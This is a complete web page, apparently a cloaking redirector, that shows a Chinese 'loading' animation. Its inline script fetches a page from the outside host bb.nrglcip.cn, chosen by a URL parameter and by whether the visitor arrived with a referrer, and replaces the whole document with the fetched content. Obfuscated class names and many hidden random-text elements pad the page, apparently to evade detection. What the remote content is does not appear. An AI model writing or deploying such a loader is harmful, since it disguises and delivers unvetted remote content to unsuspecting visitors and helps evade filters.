<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .sffzaJMOjjq {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .sffzaJMOjjq .bz9eMxp {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .sffzaJMOjjq .content {
            line-height: 50px;
            text-align: center
        }

        .sffzaJMOjjq .img {
            width: 100%
        }

        .sffzaJMOjjq .Zezg0SS32n9 {
            text-align: center
        }

        .sffzaJMOjjq .Zezg0SS32n9 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .sffzaJMOjjq .Zezg0SS32n9 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .sffzaJMOjjq .Zezg0SS32n9 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .sffzaJMOjjq .Zezg0SS32n9 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .sffzaJMOjjq .Zezg0SS32n9 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .sffzaJMOjjq .Zezg0SS32n9 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .sffzaJMOjjq .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function J6sJpwpVg(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var CCJrwS = J6sJpwpVg('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ CCJrwS +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ CCJrwS +".html?a=share";
		}
		
        PINqEQq6=url+"#"+new Date().getTime();
        PINqEQq6 && function() {
            $.get(PINqEQq6, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >AWk08MjePYA4qHZVuISgBALT6m2LNCNxt3bR4I0zyiqZn83a9Ucn3fRhfYJuLwApX5J6IiYzMdWZlS5W16W1C1xPvf1D</ul>
<b style='display:none' >JAYh0pqt7ZKjvTI2TyuW14tcNXtFlAcUTdiCaAZjIRC9lSQYhq2yTLbH5pVK9IgferQ3Yb0lX8U8KD4</b>
<ul style='display:none' >AWk08MjePYA4qHZVuISgBALT6m2LNCNxt3bR4I0zyiqZn83a9Ucn3fRhfYJuLwApX5J6IiYzMdWZlS5W16W1C1xPvf1D</ul>
<li style='display:none' >qhdPZ2NKBgajktNucWoIMAXpK6SjPG4DWmiGw0os5qKYyErhnFE</li>
<b style='display:none' >JAYh0pqt7ZKjvTI2TyuW14tcNXtFlAcUTdiCaAZjIRC9lSQYhq2yTLbH5pVK9IgferQ3Yb0lX8U8KD4</b>
<span style='display:none'>XJrPaUMpe3SsVhF2TpFcsgIDdcwf8y94dYxj9vK</span>
<p  style='display:none'>LEGveXTftG3Eyz5AoDcymOlyJXEtf8BGvSCwwZzJhOdYR2If9PUNN6hETe9zYAC5ata2xSnyl2t4W6pyZdGxhm</p>
<img  src='' style='display:none'>
<p  style='display:none'>LEGveXTftG3Eyz5AoDcymOlyJXEtf8BGvSCwwZzJhOdYR2If9PUNN6hETe9zYAC5ata2xSnyl2t4W6pyZdGxhm</p><div class="sffzaJMOjjq">
    <div class="bz9eMxp">
        <div class="Zezg0SS32n9">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>I3sYkD0sK8cJ3mXA34sL7TutxrFyyd1PfwmkypxNMxAJh6WtoT0X14nIPBYV3T0jEH72mX0ZSHDykzNpergzy9bXeCeUuLDUC5G</div>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>HgAn7tkcFI51DJjwv9vRp1Fr1ESdyh1aHxNwxNPdp</a>
<ul style='display:none' >sZLhco89ICvGfTxRCyrC3vSx</ul>
<b style='display:none' >UiLDeKpE4jMSCfNA0gIEyP2eMN92uMLbnBMxMOuR7YjO1pMBu9vZ</b>
<b style='display:none' >UiLDeKpE4jMSCfNA0gIEyP2eMN92uMLbnBMxMOuR7YjO1pMBu9vZ</b>
<p  style='display:none'>gOjjR0ZWbDqG1CAwOubgyXyrNVTxJPClxTsb4</p>
<ul style='display:none' >sZLhco89ICvGfTxRCyrC3vSx</ul>
<li style='display:none' >g9IGodKWKEaN8Mz00UQlEUzeEVTWRFCO</li>
<ul style='display:none' >sZLhco89ICvGfTxRCyrC3vSx</ul></body>
</html>